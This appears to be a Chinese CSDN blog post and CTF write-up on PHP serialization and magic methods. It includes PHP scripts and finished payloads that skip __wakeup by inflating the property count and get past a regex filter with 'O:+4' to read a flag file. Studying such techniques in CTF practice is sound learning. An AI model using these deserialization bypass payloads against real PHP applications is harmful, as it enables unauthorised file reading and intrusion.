php序列化和反序列化

已于 2024-03-20 00:33:56 修改
阅读量1.2k 收藏 30
点赞数 40
文章标签: php 开发语言
于 2024-03-16 21:07:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoJing6/article/details/136767876
版权
本文详细介绍了PHP中的魔术方法,如构造函数__construct、析构函数__destruct和在反序列化时触发的__wakeup。通过实例展示了如何利用这些方法构造pop链并绕过限制,以及在实际场景中的应用和注意事项。
摘要由CSDN通过智能技术生成

三个魔术方法:
PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),这些方法在PHP中充当了举足轻重的作用。

(1) __construct()函数
类的构造函数,创建时自动调用,用得到的参数覆盖$file。php中构造方法是对象创建完成后第一个被对象自动调用的方法,在每个类中都有一个构造方法,如果没有显示地声明它,那么类中都会默认存在一个没有参数且内容为空的构造方法。

(2)__destruct()函数
是 PHP 面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等,但__destruct() 在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已,而 PHP 的特性 (运行完一次请求则销毁环境 )的做法,也没必要使用 __destruct() ,执行完请求后所有该销毁的都会销毁。__destruct() 的声明格式类似于构造函数 __construct , 该名字是固定的,以两个下划线开头,然后跟上 destruct 关键字,该函数没有任何参数,也不需要更不要返回任何值,该函数的原型如下:

function __destruct()
{
    // 其它代码
}
(3)__wakeup()函数
在进行PHP反序列化时,会先调用这个函数,但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup()的执行。

例如这道题就是对__wakeup函数的理解利用

运用脚本生成序列化字符串 O:4:"xctf":1:{s:4:"flag";s:3:"111";}  在线代码运行 (toolnb.com)

<?php
class xctf{ 
public $flag = '111'; 
public function __wakeup(){ 
exit('bad requests'); 
}
}
$Myon = new xctf();
$Myon = serialize($Myon);
echo $Myon;
?>

然后构建playload:/?code=O:4:"xctf":1:{s:4:"flag";s:3:"111";},发现报错就是__wakeup()函数的问题,需要对象属性个数的值大于真实的属性个数,所以修改payload:/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";},拿到flag

Web_php_unserialize

这个题就考的是正则匹配的绕过与__wakeup()的绕过,以及base64编码,构造的pop链如下

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$Myon = new Demo('fl4g.php');
$Myon = serialize($Myon);
$Myon = str_replace('O:4','O:+4',$Myon); 
$Myon = str_replace('1:{','2:{',$Myon);
echo base64_encode($Myon);
?>

$Myon = str_replace('O:4','O:+4',$Myon);        // 对正则匹配的绕过
$Myon = str_replace('1:{','2:{',$Myon);              // 对__wakeup()函数的绕过

这个题不能放在在线base64工具上加密,因为file是私有变量,所以序列化之后的字符串开头结 尾各有一个空白字符(即%00),字符串长度也比实际长度大 2,如果将序列化结 果复制到在线的 base64 网站进行编码可能就会丢掉空白字符,所以这里直接在 php 代码里进行编码。类似的还有 protected 类型的变量,序列化之后字符串首 部会加上%00*%00。

构造payload,用get传参方式将值传给var

即 /?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

于是拿到flag

------------------------------------------------------------------------------------------------------------------------------

这样的php代码构造pop链的时候要加上$a->file='flag.php'

如果不加,那么在 __tostring() 方法中的 file_get_contents() 函数将无法读取文件内容,因为它需要一个有效的文件路径。在这种情况下,当您尝试序列化 $Myon 对象时,该对象的字符串表示形式将不包含任何文件内容。
                        
原文链接:https://blog.csdn.net/Myon5/article/details/129844589

BoJing6
关注
  • 40
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解PHP序列序列原理
10-18
本篇文章给大家分享了下PHP序列漏洞系列之PHP序列序列原理的相关知识,有这方面需要的朋友参考学习下吧。
渗透学习之PHP--序列
qq_62886656的博客
10-03 2602
渗透学习之PHP--序列
PHP序列序列
qq_31088019的博客
08-25 4143
PHP序列序列及案例
php序列漏洞(万字详解)
最新发布
2401_83947434的博客
04-12 755
序列是将对象或数组转为方便存储、传输的字符串,php使用serialize()函数将对象序列序列只作用于对象的成员属性,不序列成员方法;序列是将序列得到的字符串转为一个对象的过程;序列生成的对象的成员属性值由被序列的字符串决定,与原来类预定义的值无关;序列使用unserialize()函数将字符串转换为对象,序列使用serialize()函数将对象转为字符串;//序列phpclass tests:3:"666";s:1:"b";i:6666;}';
PHP序列序列入门
2301_77342543的博客
07-13 1928
serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列序列我们可以很方便的在PHP中进行对象的传递。本质上序列是没有危害的。但是如果用户对数据可控那就可以利用序列构造payload攻击php//实例一个对象?返回结果s:4:"name";s:3:"age";s:2:"18";O代表对象,这里是序列的一个对象,要序列数组的就用A6表示的是类的长度sunset表示对是类名。
PHP序列的概念
qq_60463414的博客
08-13 1316
PHP序列漏洞之PHP序列概念
PHP序列基础知识储备
2302_79800344的博客
03-14 531
学习序列的知识储备与前提
PHP序列,序列
kuzemax的博客
08-07 848
序列常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候序列一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。
PHP 序列序列函数实例详解
12-20
PHP中,序列序列是两个非常重要的概念,它们主要用于处理复杂的数据结构,如数组、对象等。序列允许我们将这些数据结构转换为简单的字符串格式,方便存储或传输,而序列则能将这些字符串还原为原始...
PHP 序列序列
05-01
在`demo`文件中,可能包含了一个关于如何使用PHP序列序列的示例代码。你可以查看这个文件来进一步了解这两个功能的实际应用。 总结来说,PHP序列序列是处理和交换数据的关键工具,但同时也需要...
java 序列PHP格式。
08-18
将java数据 序列PHP的格式 a:4:{s:6:"title2";s:13:"这是标题2";s:6:"title3";s:13:"这是标题3";s:5:"title";s:13:"这是标题1";s:6:"title4";s:13:"这是标题4";} 或者a:1:{i:0;a:1:{s:4:"name";s:10:"这是1321";}}等其他类型
PHP序列(serialize)格式详解
03-30
PHP序列(serialize)格式详解,呵呵~
php json与xml序列/序列
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列序列PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
PHP序列入门手把手详解
顶峰
02-08 1847
php
PHP的序列序列
一颗小白菜的博客
08-17 544
PHP程序执行结束以后会将文件中的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这时候就可以通过序列序列保存程序中的对象,给其他程序使用。php序列可以将对象转换成字符串,但只序列属性,不序列方法。unserialize()函数的变量可控,php文件中存在可利用的类,类中有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP序列序列函数达到序列序列的目的。...
PHP序列基础
m0_66458291的博客
09-21 136
php序列的相关知识总结
CVE-2016-7124漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-22 2046
CVE-2016-7124漏洞复现 实验环境 操作机:Windows 10 服务器:apache 2.4.39 PHP版本:5.2.17nts 漏洞影响版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞产生原因 如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 漏洞复现 编写测试脚本 <?php header("Content-Type
php php 序列方法,PHP序列的4种方法已公布,这是你PHP进阶之路必会的
weixin_39631350的博客
03-19 3885
【摘要】php作为一种编程软件,也能实现很多功能,不过今天环球网校的小编要为大家讲解PHP序列的4种方法已公布,这是你PHP进阶之路必会的?看完这个代码你就明白了,因为只要你了解了PHP序列的4种方法已公布,这是你PHP进阶之路必会的,你对于PHP7的了解就更深入了。在PHP中,序列用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。本文讲述PHP序列的四种方案,感兴趣的可以了解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值